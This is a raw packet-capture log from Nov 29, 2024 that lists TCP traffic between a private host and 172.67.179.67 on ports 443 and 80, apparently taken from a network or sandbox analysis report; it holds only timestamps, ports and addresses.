                                                                                                            Nov 29, 2024 09:09:32.012221098 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.012263060 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012311935 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012312889 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012361050 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012361050 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012459040 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012459040 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012557030 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012557030 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012608051 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012608051 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012656927 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012658119 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012706995 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012706995 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.012804985 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.136707067 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.136729002 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.136743069 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.136754990 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.136905909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.136905909 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137098074 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137134075 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137182951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137224913 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137248039 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137296915 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137296915 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137346029 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137346029 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137394905 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137492895 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137494087 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137542009 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137592077 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137592077 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137592077 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137702942 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137782097 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137782097 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.137835979 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137840033 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137840986 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137841940 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137842894 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137844086 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137850046 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.137938976 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138003111 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138082981 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138133049 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138133049 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138180971 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138230085 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138230085 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138278961 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138278961 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138444901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138444901 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138452053 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.138493061 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138591051 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138591051 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138591051 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138639927 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138639927 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138689041 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138689041 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138737917 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138737917 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138787031 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138787031 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138837099 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138837099 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138885021 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138933897 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138933897 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138983011 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.138988972 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.139033079 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139033079 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139033079 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139081001 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139131069 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139131069 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139131069 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139178991 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139233112 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139233112 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139233112 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139281988 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139326096 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139326096 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139326096 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139374971 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139425039 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139425039 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139425039 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139472961 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139522076 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139522076 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139523029 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139559984 CET44349755172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:32.139570951 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139620066 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139620066 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139620066 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139668941 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139718056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139718056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139718056 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139766932 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139816046 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139816046 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139816046 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139864922 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139914989 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139914989 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139914989 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139914989 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139962912 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.139962912 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140012026 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140060902 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140110016 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140110016 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140110016 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140239000 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140239000 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140336037 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140409946 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140409946 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140458107 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140458107 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140506983 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140556097 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140654087 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140654087 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140702963 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140752077 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140800953 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140850067 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.140950918 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.141000032 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.141000032 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.141051054 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.141051054 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.141094923 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.523555994 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:32.753709078 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:33.034363031 CET49755443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.499875069 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.499944925 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:36.500125885 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.500250101 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.500289917 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:36.824207067 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:36.825181007 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.825197935 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:36.825360060 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:36.825371981 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.501163006 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.501287937 CET44349756172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.501461029 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.501859903 CET49756443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.525893927 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.525950909 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.526218891 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.526356936 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.526392937 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.853060961 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.854115963 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.854159117 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:37.854844093 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:37.854876995 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:38.552697897 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:38.552747965 CET44349757172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:38.552951097 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:38.553241014 CET49757443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.342873096 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.342927933 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.343250990 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.343472958 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.343507051 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.495357037 CET4975980192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.654336929 CET8049759172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.654618979 CET4975980192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.654823065 CET4975980192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.676779032 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.677751064 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.677789927 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.677999973 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:40.678034067 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:40.813587904 CET8049759172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.144093037 CET8049759172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.144138098 CET8049759172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.144171953 CET8049759172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.144392967 CET4975980192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:41.196687937 CET4975980192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:41.351345062 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.351454020 CET44349758172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:09:41.351735115 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:09:41.351799965 CET49758443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:26.701256990 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:26.701335907 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:26.701709032 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:26.726531029 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:26.726567984 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.054097891 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.054364920 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.058044910 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.058056116 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.058290005 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.088176012 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.129462004 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.776412010 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.776607990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.776742935 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.776768923 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.776833057 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.776993990 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.777070999 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.777124882 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.777250051 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.777304888 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.777358055 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.777543068 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.777591944 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.777776957 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.777826071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.778019905 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.778146029 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.778239012 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.778256893 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.778307915 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:27.778436899 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:27.826746941 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.003334999 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.003498077 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.003782034 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.003801107 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.003823042 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.004000902 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.004066944 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.004106998 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.004302025 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.004740953 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.004921913 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.005009890 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.005193949 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.005230904 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.005467892 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.005740881 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.005934000 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.006021976 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.006129980 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.006171942 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.006345987 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.006392002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.006550074 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.006762028 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.006798029 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.007425070 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.007524014 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.007616997 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.007621050 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.007661104 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.007780075 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.008093119 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.008286953 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.008323908 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.060986042 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.232038021 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.232378960 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.232527018 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.232662916 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.232743025 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.232836962 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.232856035 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.233064890 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.233447075 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.233674049 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.234447002 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.234622002 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.234675884 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.234869003 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.235553980 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.235790014 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.236032009 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.236219883 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.236258030 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.236866951 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.237070084 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.237127066 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.237292051 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.237348080 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.237551928 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.237776041 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.237998009 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.238599062 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.238790035 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.238914967 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.239444017 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.239559889 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.239676952 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.239726067 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.239762068 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.239928007 CET49761443192.168.11.30172.67.179.67
                                                                                                            Nov 29, 2024 09:10:28.462552071 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.462688923 CET44349761172.67.179.67192.168.11.30
                                                                                                            Nov 29, 2024 09:10:28.462759972 CET49761443192.168.11.30172.67.179.67
